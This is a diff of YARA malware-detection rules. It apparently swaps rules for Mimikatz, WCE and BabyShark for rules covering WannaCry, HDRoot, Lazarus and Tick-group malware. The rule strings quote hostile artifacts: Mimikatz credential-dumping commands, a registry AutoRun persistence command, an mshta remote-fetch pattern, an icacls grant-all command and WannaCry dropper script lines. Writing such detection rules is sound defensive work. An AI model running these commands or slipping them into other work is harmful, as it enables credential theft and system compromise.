-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mimikatz.yar#L48-L74"
+		reference = "https://goo.gl/HG2j5T"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_wannacry.yar#L12-L46"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bf972a2c0465c3bbdde6f03d91c6f479d0f66c6d3e9512355de5a973164b56a5"
+		logic_hash = "a652444d7946dbbc4fae76cd01f2e20993999fd1e6fc48a9ac0da57aab87a2da"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
-		tool_author = "Benjamin DELPY (gentilkiwi)"
+		hash1 = "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
 
 	strings:
-		$exe_x86_1 = { 89 71 04 89 [0-3] 30 8d 04 bd }
-		$exe_x86_2 = { 8b 4d e? 8b 45 f4 89 75 e? 89 01 85 ff 74 }
-		$exe_x64_1 = { 33 ff 4? 89 37 4? 8b f3 45 85 c? 74}
-		$exe_x64_2 = { 4c 8b df 49 [0-3] c1 e3 04 48 [0-3] 8b cb 4c 03 [0-3] d8 }
-		$sys_x86 = { a0 00 00 00 24 02 00 00 40 00 00 00 [0-4] b8 00 00 00 6c 02 00 00 40 00 00 00 }
-		$sys_x64 = { 88 01 00 00 3c 04 00 00 40 00 00 00 [0-4] e8 02 00 00 f8 02 00 00 40 00 00 00 }
+		$x1 = "icacls . /grant Everyone:F /T /C /Q" fullword ascii
+		$x2 = "taskdl.exe" fullword ascii
+		$x3 = "tasksche.exe" fullword ascii
+		$x4 = "Global\\MsWinZonesCacheCounterMutexA" fullword ascii
+		$x5 = "WNcry@2ol7" fullword ascii
+		$x6 = "www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com" ascii
+		$x7 = "mssecsvc.exe" fullword ascii
+		$x8 = "C:\\%s\\qeriuwjhrf" fullword ascii
+		$x9 = "icacls . /grant Everyone:F /T /C /Q" fullword ascii
+		$s1 = "C:\\%s\\%s" fullword ascii
+		$s2 = "<!-- Windows 10 --> " fullword ascii
+		$s3 = "cmd.exe /c \"%s\"" fullword ascii
+		$s4 = "msg/m_portuguese.wnry" fullword ascii
+		$s5 = "\\\\192.168.56.20\\IPC$" fullword wide
+		$s6 = "\\\\172.16.99.5\\IPC$" fullword wide
+		$op1 = { 10 ac 72 0d 3d ff ff 1f ac 77 06 b8 01 00 00 00 }
+		$op2 = { 44 24 64 8a c6 44 24 65 0e c6 44 24 66 80 c6 44 }
+		$op3 = { 18 df 6c 24 14 dc 64 24 2c dc 6c 24 5c dc 15 88 }
+		$op4 = { 09 ff 76 30 50 ff 56 2c 59 59 47 3b 7e 0c 7c }
+		$op5 = { c1 ea 1d c1 ee 1e 83 e2 01 83 e6 01 8d 14 56 }
+		$op6 = { 8d 48 ff f7 d1 8d 44 10 ff 23 f1 23 c1 }
 
 	condition:
-		( all of ( $exe_x86_* ) ) or ( all of ( $exe_x64_* ) ) or ( any of ( $sys_* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 10000KB and ( 1 of ( $x* ) and 1 of ( $s* ) or 3 of ( $op* ) )
 }
-rule SIGNATURE_BASE_Wce
+rule SIGNATURE_BASE_Wannacry_Ransomware_Gen : FILE
 {
 	meta:
-		description = "wce"
-		author = "Benjamin DELPY (gentilkiwi)"
-		id = "857981ee-3f57-580b-8bfd-8d2109298e27"
-		date = "2020-08-10"
+		description = "Detects WannaCry Ransomware"
+		author = "Florian Roth (Nextron Systems) (based on rule by US CERT)"
+		id = "d28d3d76-9c24-5476-9a0c-936c17477d6a"
+		date = "2017-05-12"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mimikatz.yar#L76-L89"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-132A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_wannacry.yar#L48-L66"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a16db99dcaaf1b6c33a738aab4f4d3812366258bc2f6dd32250ee1b1a0616f1c"
+		logic_hash = "8f81c918dc1e2c8ef2e334ae504f88b10aef9e54a64486061d45296d2d738aab"
 		score = 75
 		quality = 85
-		tags = ""
-		tool_author = "Hernan Ochoa (hernano)"
+		tags = "FILE"
+		hash1 = "9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05"
+		hash2 = "8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df"
+		hash3 = "4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359"
 
 	strings:
-		$hex_legacy = { 8b ff 55 8b ec 6a 00 ff 75 0c ff 75 08 e8 [0-3] 5d c2 08 00 }
-		$hex_x86 = { 8d 45 f0 50 8d 45 f8 50 8d 45 e8 50 6a 00 8d 45 fc 50 [0-8] 50 72 69 6d 61 72 79 00 }
-		$hex_x64 = { ff f3 48 83 ec 30 48 8b d9 48 8d 15 [0-16] 50 72 69 6d 61 72 79 00 }
+		$s1 = "__TREEID__PLACEHOLDER__" ascii
+		$s2 = "__USERID__PLACEHOLDER__" ascii
+		$s3 = "Windows for Workgroups 3.1a" fullword ascii
+		$s4 = "PC NETWORK PROGRAM 1.0" fullword ascii
+		$s5 = "LANMAN1.0" fullword ascii
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and filesize < 5000KB and all of them
 }
-rule SIGNATURE_BASE_Power_Pe_Injection
+rule SIGNATURE_BASE_Wanncry_M_Vbs : FILE
 {
 	meta:
-		description = "PowerShell with PE Reflective Injection"
-		author = "Benjamin DELPY (gentilkiwi)"
-		id = "a71fe9f2-9c2a-5650-a5c7-116b76f10db6"
-		date = "2020-08-10"
+		description = "Detects WannaCry Ransomware VBS"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a8f13bd2-984d-5c8c-ac53-7d442e222850"
+		date = "2017-05-12"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mimikatz.yar#L91-L101"
+		reference = "https://goo.gl/HG2j5T"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_wannacry.yar#L68-L83"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "64a7033d51e8933912f37ce68bffc216073a88cae1ea7492e71a812411ae6a9d"
+		logic_hash = "e4606834535b4cad2e0d4a9bf6519fc4d749422fa4920f91fed9147ccfdff090"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "51432d3196d9b78bdc9867a77d601caffd4adaa66dcac944a5ba0b3112bbea3b"
 
 	strings:
-		$str_loadlib = "0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9"
+		$x1 = ".TargetPath = \"C:\\@" ascii
+		$x2 = ".CreateShortcut(\"C:\\@" ascii
+		$s3 = " = WScript.CreateObject(\"WScript.Shell\")" ascii
 
 	condition:
-		$str_loadlib
+		( uint16( 0 ) == 0x4553 and filesize < 1KB and all of them )
 }
-rule SIGNATURE_BASE_Mimikatz_Logfile
+rule SIGNATURE_BASE_Wanncry_BAT : FILE
 {
 	meta:
-		description = "Detects a log file generated by malicious hack tool mimikatz"
+		description = "Detects WannaCry Ransomware BATCH File"
 		author = "Florian Roth (Nextron Systems)"
-		id = "921d85fc-fb4d-57ed-b4ac-203d5c6f1e8e"
-		date = "2015-03-31"
+		id = "0929f0de-28ac-5534-a6fd-7b131abda011"
+		date = "2017-05-12"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mimikatz.yar#L103-L119"
+		reference = "https://goo.gl/HG2j5T"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_wannacry.yar#L85-L101"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4591cda5bd5a555292087da26193accc4f00d7c0611be8d5ab6dd4dabb14a0ef"
-		score = 80
+		logic_hash = "472c6aa0f1b5229d639ef347ea39947d3fd292cda3c4086e29a19b64daad4f3f"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077"
 
 	strings:
-		$s1 = "SID               :" ascii fullword
-		$s2 = "* NTLM     :" ascii fullword
-		$s3 = "Authentication Id :" ascii fullword
-		$s4 = "wdigest :" ascii fullword
+		$s1 = "@.exe\">> m.vbs" ascii
+		$s2 = "cscript.exe //nologo m.vbs" fullword ascii
+		$s3 = "echo SET ow = WScript.CreateObject(\"WScript.Shell\")> " ascii
+		$s4 = "echo om.Save>> m.vbs" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x6540 and filesize < 1KB and 1 of them )
 }
-
-rule SIGNATURE_BASE_Mimikatz_Strings : FILE
+rule SIGNATURE_BASE_Wannacry_Ransomnote : FILE
 {
 	meta:
-		description = "Detects Mimikatz strings"
+		description = "Detects WannaCry Ransomware Note"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d8f63b71-c66c-5c10-9268-2d8970f7c8a1"
-		date = "2016-06-08"
+		id = "65ce8faf-0981-5382-bc15-f094ccaa9f54"
+		date = "2017-05-12"
 		modified = "2023-12-05"
-		reference = "not set"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mimikatz.yar#L121-L154"
+		reference = "https://goo.gl/HG2j5T"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_wannacry.yar#L103-L117"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "baba1e159c0fb23f68b80459291a2d2c52e84f742f51ca30b894f7fc6282ad7a"
-		score = 65
+		logic_hash = "da814848f4616166bd7b92fa1d55a54b565fa8e6036cb895e5795448e989a99d"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e"
 
 	strings:
-		$x1 = "sekurlsa::logonpasswords" fullword wide ascii
-		$x2 = "List tickets in MIT/Heimdall ccache" fullword ascii wide
-		$x3 = "kuhl_m_kerberos_ptt_file ; LsaCallKerberosPackage %08x" fullword ascii wide
-		$x4 = "* Injecting ticket :" fullword wide ascii
-		$x5 = "mimidrv.sys" fullword wide ascii
-		$x6 = "Lists LM & NTLM credentials" fullword wide ascii
-		$x7 = "\\_ kerberos -" wide ascii
-		$x8 = "* unknow   :" fullword wide ascii
-		$x9 = "\\_ *Password replace ->" wide ascii
-		$x10 = "KIWI_MSV1_0_PRIMARY_CREDENTIALS KO" ascii wide
-		$x11 = "\\\\.\\mimidrv" wide ascii
-		$x12 = "Switch to MINIDUMP :" fullword wide ascii
-		$x13 = "[masterkey] with password: %s (%s user)" fullword wide
-		$x14 = "Clear screen (doesn't work with redirections, like PsExec)" fullword wide
-		$x15 = "** Session key is NULL! It means allowtgtsessionkey is not set to 1 **" fullword wide
-		$x16 = "[masterkey] with DPAPI_SYSTEM (machine, then user): " fullword wide
+		$s1 = "A:  Don't worry about decryption." fullword ascii
+		$s2 = "Q:  What's wrong with my files?" fullword ascii
 
 	condition:
-		(( uint16( 0 ) == 0x5a4d and 1 of ( $x* ) ) or ( 3 of them ) ) and not pe.imphash ( ) == "77eaeca738dd89410a432c6bd6459907"
+		( uint16( 0 ) == 0x3a51 and filesize < 2KB and all of them )
 }
-rule SIGNATURE_BASE_Appinithook : FILE
+rule SIGNATURE_BASE_APT_Lazaruswannacry : FILE
 {
 	meta:
-		description = "AppInitGlobalHooks-Mimikatz - Hide Mimikatz From Process Lists - file AppInitHook.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "73713011-3083-5cdf-b59c-f4da67d2d2ab"
-		date = "2015-07-15"
+		description = "Rule based on shared code between Feb 2017 Wannacry sample and Lazarus backdoor from Feb 2015 discovered by Neel Mehta"
+		author = "Costin G. Raiu, Kaspersky Lab"
+		id = "e9dd9750-2366-503a-a879-972dbead6bf3"
+		date = "2017-05-15"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/Z292v6"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mimikatz.yar#L156-L176"
+		reference = "https://twitter.com/neelmehta/status/864164081116225536"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_wannacry.yar#L121-L147"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e7563e4f2a7e5f04a3486db4cefffba173349911a3c6abd7ae616d3bf08cfd45"
-		logic_hash = "a4de3a062e309715c339a45a16a7ff8f9a55851cb41097a6925fd11f649547d2"
-		score = 70
+		hash = "9c7c7149387a1c79679a87dd1ba755bc"
+		hash = "ac21c8ad899727137c4b94458d7aa8d8"
+		logic_hash = "8b32f1ea45a346088a18761540df3387997b53ea853f7a53cd292c9224f11209"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		version = "1.0"
 
 	strings:
-		$s0 = "\\Release\\AppInitHook.pdb" ascii
-		$s1 = "AppInitHook.dll" fullword ascii
-		$s2 = "mimikatz.exe" fullword wide
-		$s3 = "]X86Instruction->OperandSize >= Operand->Length" fullword wide
-		$s4 = "mhook\\disasm-lib\\disasm.c" fullword wide
-		$s5 = "mhook\\disasm-lib\\disasm_x86.c" fullword wide
-		$s6 = "VoidFunc" fullword ascii
+		$a1 = { 51 53 55 8B 6C 24 10 56 57 6A 20 8B 45 00 8D 75
+         04 24 01 0C 01 46 89 45 00 C6 46 FF 03 C6 06 01 46
+         56 E8 }
+		$a2 = { 03 00 04 00 05 00 06 00 08 00 09 00 0A 00 0D 00
+         10 00 11 00 12 00 13 00 14 00 15 00 16 00 2F 00
+         30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00
+         38 00 39 00 3C 00 3D 00 3E 00 3F 00 40 00 41 00
+         44 00 45 00 46 00 62 00 63 00 64 00 66 00 67 00
+         68 00 69 00 6A 00 6B 00 84 00 87 00 88 00 96 00
+         FF 00 01 C0 02 C0 03 C0 04 C0 05 C0 06 C0 07 C0
+         08 C0 09 C0 0A C0 0B C0 0C C0 0D C0 0E C0 0F C0
+         10 C0 11 C0 12 C0 13 C0 14 C0 23 C0 24 C0 27 C0
+         2B C0 2C C0 FF FE }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and 4 of them
+		uint16( 0 ) == 0x5A4D and filesize < 15000000 and all of them
 }
-rule SIGNATURE_BASE_HKTL_Mimikatz_Skeletonkey_In_Memory_Aug20_1
+rule SIGNATURE_BASE_Hdroot_Sample_Jul17_1 : FILE
 {
 	meta:
-		description = "Detects Mimikatz SkeletonKey in Memory"
+		description = "Detects HDRoot samples"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e7c1c512-e944-5d87-ac57-cdc9ab7cf660"
-		date = "2020-08-09"
+		id = "06356f8a-bacd-51bc-a6f4-107983a9c16e"
+		date = "2017-07-07"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/sbousseaden/status/1292143504131600384?s=12"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mimikatz.yar#L178-L190"
+		reference = "Winnti HDRoot VT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_hdroot.yar#L11-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0cc9a4d3b63e07a695df342bd2c96a55570502d6fd0ab9a1b61d63e28e1c3e05"
+		logic_hash = "41127e6d70af4b095555285f3d5570fc4dbe2a7918664502057cdc4fed8fab33"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6d2ad82f455becc8c830d000633a370857928c584246a7f41fe722cc46c0d113"
 
 	strings:
-		$x1 = { 60 ba 4f ca c7 44 24 34 dc 46 6c 7a c7 44 24 38
-              03 3c 17 81 c7 44 24 3c 94 c0 3d f6 }
+		$s1 = "gleupdate.dll" fullword ascii
+		$s2 = "\\DosDevices\\%ws\\system32\\%ws" wide
+		$s3 = "l\\Driver\\nsiproxy" fullword wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 60KB and 3 of them )
 }
-rule SIGNATURE_BASE_HKTL_Mimikatz_Memssp_Hookfn
+rule SIGNATURE_BASE_Hdroot_Sample_Jul17_2 : FILE
 {
 	meta:
-		description = "Detects Default Mimikatz memssp module in-memory"
-		author = "SBousseaden"
-		id = "89940110-8a5e-5a28-bf64-3b568f8ef1f8"
-		date = "2020-08-26"
+		description = "Detects HDRoot samples"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9ce9c0f4-e6f9-5033-ba74-367e6d741650"
+		date = "2017-07-07"
 		modified = "2023-12-05"
-		reference = "https://github.com/sbousseaden/YaraHunts/blob/master/mimikatz_memssp_hookfn.yara"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mimikatz.yar#L192-L216"
+		reference = "Winnti HDRoot VT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_hdroot.yar#L28-L64"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "27cf87f801111f17af76ab4c4f8329b73165f24f755d33edbb22d845bba6d3ff"
-		score = 70
+		logic_hash = "94288abb5c4da7c4b07eeae55070797af1556dac35ad012aff1bbe8c05e0a215"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "1c302ed9786fc600073cc6f3ed2e50e7c23785c94a2908f74f92971d978b704b"
+		hash2 = "3b7cfa40e26fb6b079b55ec030aba244a6429e263a3d9832e32ab09e7a3c4a9c"
+		hash3 = "71eddf71a94c5fd04c9f3ff0ca1eb6b1770df1a3a8f29689fb8588427b5c9e8e"
+		hash4 = "80e088f2fd2dbde0f9bc21e056b6521991929c4e0ecd3eb5833edff6362283f4"
 
 	strings:
-		$xc1 = { 48 81 EC A8 00 00 00 C7 84 24 88 00 00 00 ?? ??
-               ?? ?? C7 84 24 8C 00 00 00 ?? ?? ?? ?? C7 84 24
-               90 00 00 00 ?? ?? ?? 00 C7 84 24 80 00 00 00 61
-               00 00 00 C7 44 24 40 5B 00 25 00 C7 44 24 44 30
-               00 38 00 C7 44 24 48 78 00 3A 00 C7 44 24 4C 25
-               00 30 00 C7 44 24 50 38 00 78 00 C7 44 24 54 5D
-               00 20 00 C7 44 24 58 25 00 77 00 C7 44 24 5C 5A
-               00 5C 00 C7 44 24 60 25 00 77 00 C7 44 24 64 5A
-               00 09 00 C7 44 24 68 25 00 77 00 C7 44 24 6C 5A
-               00 0A 00 C7 44 24 70 00 00 00 00 48 8D 94 24 80
-               00 00 00 48 8D 8C 24 88 00 00 00 48 B8 A0 7D ??
-               ?? ?? ?? 00 00 FF D0 }
+		$x1 = "http://microsoftcompanywork.htm" fullword ascii
+		$x2 = "compose.aspx?s=%4X%4X%4X%4X%4X%4X" fullword ascii
+		$t1 = "http://babelfish.yahoo.com/translate_url?" fullword ascii
+		$t2 = "http://translate.google.com/translate?prev=hp&hl=en&js=n&u=%s?%d&sl=es&tl=en" fullword ascii
+		$u1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5." ascii
+		$u2 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)" fullword ascii
+		$u3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; TERA:" fullword ascii
+		$s1 = "\\system32\\ntoskrnl.exe" ascii
+		$s2 = "Schedsvc.dll" fullword wide
+		$s3 = "dllserver64.dll" fullword ascii
+		$s4 = "C:\\TERA_SR.txt" fullword ascii
+		$s5 = "updatevnsc.dat" fullword wide
+		$s6 = "tera dll service global event" fullword ascii
+		$s7 = "Referer: http://%s/%s" fullword ascii
+		$s8 = "tera replace dll config" fullword ascii
+		$s9 = "SetupDll64.dll" fullword ascii
+		$s10 = "copy %%ComSpec%% \"%s\"" fullword ascii
 
 	condition:
-		$xc1
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( 1 of ( $x* ) or all of ( $u* ) or 8 of them )
 }
-rule SIGNATURE_BASE_HKTL_Mimikatz_Icon : FILE
+rule SIGNATURE_BASE_Unspecified_Malware_Jul17_1A : FILE
 {
 	meta:
-		description = "Detects mimikatz icon in PE file"
-		author = "Arnim Rupp"
-		id = "2a5ea476-a30d-5eac-b57a-3fb49386c046"
-		date = "2023-02-18"
+		description = "Detects samples of an unspecified malware - July 2017"
+		author = "Florian Roth (Nextron Systems)"
+		id = "348515d5-784f-519d-b426-87b8a53de5f3"
+		date = "2017-07-07"
 		modified = "2023-12-05"
-		reference = "https://blog.gentilkiwi.com/mimikatz"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mimikatz.yar#L218-L238"
+		reference = "Winnti HDRoot VT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_hdroot.yar#L66-L83"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a07d477d1645e6df4f0706e44df11ea006c89e4d3218ed18a8a97b60853ff4ff"
-		score = 60
+		logic_hash = "e23af53be3e700055ea6536669065c131e7f674d45e43a389447c8c1f549dee5"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License"
-		hash1 = "61c0810a23580cf492a6ba4f7654566108331e7a4134c968c2d6a05261b2d8a1"
-		hash2 = "1c3f584164ef595a37837701739a11e17e46f9982fdcee020cf5e23bad1a0925"
-		hash3 = "c6bb98b24206228a54493274ff9757ce7e0cbb4ab2968af978811cc4a98fde85"
-		hash4 = "721d3476cdc655305902d682651fffbe72e54a97cd7e91f44d1a47606bae47ab"
-		hash5 = "c0f3523151fa307248b2c64bdaac5f167b19be6fccff9eba92ac363f6d5d2595"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e1c38142b6194237a4cd4603829aa6edb6436e7bba15e3e6b0c9e8c6b629b42b"
 
 	strings:
-		$ico = {79 e1 d7 ff 7e e5 db ff 7f e8 dc ff 85 eb dd ff ba ff f1 ff 66 a0 b6 ff 01 38 61 ff 22 50 75 c3}
+		$s1 = "%SystemRoot%\\System32\\wuauserv.dll" fullword ascii
+		$s2 = "systemroot%\\system32\\wuauserv.dll" fullword ascii
+		$s3 = "ocgen.logIN" fullword wide
+		$s4 = "ocmsn.logIN" fullword wide
+		$s5 = "Install.log" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $ico and filesize < 10MB
+		( uint16( 0 ) == 0x5a4d and filesize < 900KB and all of them )
 }
 
-rule SIGNATURE_BASE_MAL_PE_Type_Babyshark_Loader : FILE
+rule SIGNATURE_BASE_APT_Tick_Sysmon_Loader_Jun18 : FILE
 {
 	meta:
-		description = "Detects PE Type babyShark loader mentioned in February 2019 blog post by PaloAltNetworks"
+		description = "Detects Sysmon Loader from Tick group incident - Weaponized USB"
 		author = "Florian Roth (Nextron Systems)"
-		id = "141e7a67-7930-5fd8-ac91-5d31b99e4ff3"
-		date = "2019-02-24"
+		id = "eae013c3-4774-5342-bd1a-5f2825612747"
+		date = "2018-06-23"
 		modified = "2023-12-05"
-		reference = "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_babyshark.yar#L4-L27"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/06/unit42-tick-group-weaponized-secure-usb-drives-target-air-gapped-critical-systems/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_tick_weaponized_usb.yar#L13-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0ab9a30cb731922d965a9cf58094fea36d5c74b9989324efee603808591ea6a5"
+		logic_hash = "e6256269409322a4f48bfdaafc52f5ec83602cf66f2e3b8d83ed5175e1dc506f"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
-		hash1 = "6f76a8e16908ba2d576cf0e8cdb70114dcb70e0f7223be10aab3a728dc65c41c"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "31aea8630d5d2fcbb37a8e72fe4e096d0f2d8f05e03234645c69d7e8b59bb0e8"
 
 	strings:
-		$x1 = "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\" /v AutoRun /t REG_SZ /d \"%s\" /f" fullword ascii
-		$x2 = /mshta\.exe http:\/\/[a-z0-9\.\/]{5,30}\.hta/
-		$xc1 = { 57 69 6E 45 78 65 63 00 6B 65 72 6E 65 6C 33 32
-               2E 44 4C 4C 00 00 00 00 }
+		$x1 = "SysMonitor_3A2DCB47" fullword ascii
+		$s1 = "msxml.exe" fullword ascii
+		$s2 = "wins.log" fullword ascii
+		$s3 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\run" fullword ascii
+		$s4 = "%2d-%2d-%2d-%2d" fullword ascii
+		$s5 = "%USERPROFILE%" fullword ascii
+		$s6 = "Windows NT" fullword ascii
+		$s7 = "device monitor" fullword ascii
+		$s8 = "\\Accessories" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( pe.imphash ( ) == "57b6d88707d9cd1c87169076c24f962e" or 1 of them or for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "thawte SHA256 Code Signing CA" and pe.signatures [ i ] . serial == "0f:ff:e4:32:a5:3f:f0:3b:92:23:f8:8b:e1:b8:3d:9d" ) )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "c5bb16e79fb500c430edce9481ae5b2b" or $x1 or 6 of them )
 }
-rule SIGNATURE_BASE_APT_NK_Babyshark_Kimjoingrat_Apr19_1 : FILE
+rule SIGNATURE_BASE_APT_Tick_Homamdownloader_Jun18 : FILE
 {
 	meta:
-		description = "Detects BabyShark KimJongRAT"
+		description = "Detects HomamDownloader from Tick group incident - Weaponized USB"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c6bd1e1a-68f2-5a2d-a159-b16ea0d33987"
-		date = "2019-04-27"
+		id = "8ec52cb7-41a4-50a9-9cb1-23bee354680f"
+		date = "2018-06-23"
 		modified = "2023-12-05"
-		reference = "https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_babyshark.yar#L29-L53"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/06/unit42-tick-group-weaponized-secure-usb-drives-target-air-gapped-critical-systems/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_tick_weaponized_usb.yar#L40-L58"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3fec0f21e299e09ae9734f256edbbca81a53f860b42e99a78b07d344552f1062"
+		logic_hash = "b4c798aa0c71f44f271e710d791c97adcbf9bd28ec87dd1d8d589029e58d1cfb"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712"
